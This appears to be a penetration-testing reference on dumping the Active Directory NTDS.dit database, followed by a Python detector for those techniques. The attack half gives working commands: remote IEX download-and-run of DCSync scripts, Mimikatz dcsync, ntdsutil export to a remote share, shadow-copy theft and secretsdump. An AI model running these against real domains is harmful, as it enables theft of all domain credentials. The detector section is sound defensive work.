Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.
Invoke-DCSync (pentestfactory)
Invoke-DCSync pulls Mimikatz, PowerView and ADRecon from GitHub into memory and then performs DCSync.
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/pentestfactory/Invoke-DCSync/main/Invoke-DCSync.ps1")
# Execute
Invoke-DCSync
Invoke-DCSync (S3cur3Th1sSh1t)
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-DCSync.ps1")
# Execute
Invoke-DCSync -dcfqdn DC01.security.local -username administrator
Metasploit
use auxiliary/admin/smb/psexec_ntdsgrab
secretsdump.py can then be used to pull hashes from the ntds.dit database together with the SYSTEM hive file (see the secretsdump.py section further down).
Mimikatz
# Dump hashes for a specified user
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /user:moe"'
# Dump hashes for all users
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /all"'
# Dump hashes by injecting into the lsass process on the Domain Controller
Invoke-Mimikatz -command '"lsadump::lsa /inject"'
ntdsutil.exe (Native)
With access to the Domain Controller it's possible to run the ntdsutil.exe native binary to dump SAM, SYSTEM and ntds.dit ready for exfiltration.
# Dump to local directory
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Exfiltration' q q"
# Dump to remote share
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full \\10.10.10.10\Share\Exf' q q"
Viewing the contents of c:\Exfiltration we see the files.
Secretsdump can be used against these files for extraction, as shown in the secretsdump.py section below.
Secretsdump.py
# With valid credentials
secretsdump.py security.local/moe:Password123@10.10.10.100 -just-dc-ntlm
# Dump from exfiltrated ntds.dit and SYSTEM files
sudo secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# Dump results from ntdsutil.exe method
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
PsMapExec
# As current user
PsMapExec -Targets DCs -Method SMB -Module NTDS
# As a specified user
PsMapExec -Targets DCs -Method SMB -Module NTDS -Username Administrator -Password Password123!
Volume Shadow Copy
# Create VSS snapshot of system drive
vssadmin create shadow /for=C:
# Create a copy of NTDS.dit and SYSTEM from the snapshot and move them to C:\Exfiltration
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\Exfiltration
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Exfiltration
The NTDS.dit and SYSTEM files can be exfiltrated off the system and used with a tool such as secretsdump.py for hash extraction.
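As an added defender-side example that is not part of the original page: a small Python detector that runs indicators for the techniques above (ntdsutil IFM export, vssadmin snapshots, copies of NTDS.dit or SYSTEM from a shadow-copy path, Mimikatz lsadump, secretsdump against NTDS) plus the classic DCSync check (a non-machine account exercising the DS-Replication-Get-Changes rights in Security event 4662) over constructed log lines. The "EventID= Host= User= Detail=" log layout, host names and account names are assumptions made for the example.

```python
import re

# Constructed log layout (assumption): Detail is the process command line for
# Sysmon event 1 and the accessed Properties GUID for Security event 4662.
DCSYNC_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
)
CMD_RULES = [
    ("ntdsutil IFM export", re.compile(r"ntdsutil.*\bifm\b.*create\s+full", re.I)),
    ("VSS snapshot created", re.compile(r"vssadmin.*create\s+shadow", re.I)),
    ("NTDS.dit/SYSTEM read from shadow copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*(ntds\.dit|config\\SYSTEM)", re.I)),
    ("Mimikatz lsadump", re.compile(r"lsadump::(dcsync|lsa)", re.I)),
    ("secretsdump against NTDS", re.compile(r"secretsdump.*(-just-dc|-ntds\b)", re.I)),
]
LINE_RE = re.compile(r"EventID=(?P<eid>\d+)\s+Host=(?P<host>\S+)\s+User=(?P<user>\S+)\s+Detail=(?P<detail>.*)")

def parse_line(line):
    """Split one constructed log line into its fields, or None if malformed."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None

def detect(lines):
    """Return (host, user, rule) alerts for NTDS extraction indicators."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["eid"] == "4662":
            # Replication rights used by anything other than a DC machine account ($)
            if any(g in rec["detail"].lower() for g in DCSYNC_GUIDS) and not rec["user"].endswith("$"):
                alerts.append((rec["host"], rec["user"], "DCSync replication request"))
            continue
        for name, rx in CMD_RULES:
            if rx.search(rec["detail"]):
                alerts.append((rec["host"], rec["user"], name))
    return alerts

SAMPLE_LOG = [  # constructed sample lines, not real telemetry
    r"EventID=1 Host=DC01 User=SECURITY\svc_backup Detail=vssadmin create shadow /for=C:",
    r"EventID=1 Host=DC01 User=SECURITY\svc_backup Detail=copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\Exfiltration",
    r"EventID=1 Host=DC01 User=SECURITY\admin Detail=powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Exfiltration' q q",
    r"EventID=4662 Host=DC01 User=DC02$ Detail=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    r"EventID=4662 Host=DC01 User=moe Detail=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    r"EventID=1 Host=WS07 User=SECURITY\bob Detail=notepad.exe C:\notes.txt",
]
```

Running `detect(SAMPLE_LOG)` yields four alerts: the snapshot, the shadow-copy read of NTDS.dit, the ntdsutil IFM export, and the DCSync request from "moe"; the replication event from the DC02$ machine account and the notepad line are ignored.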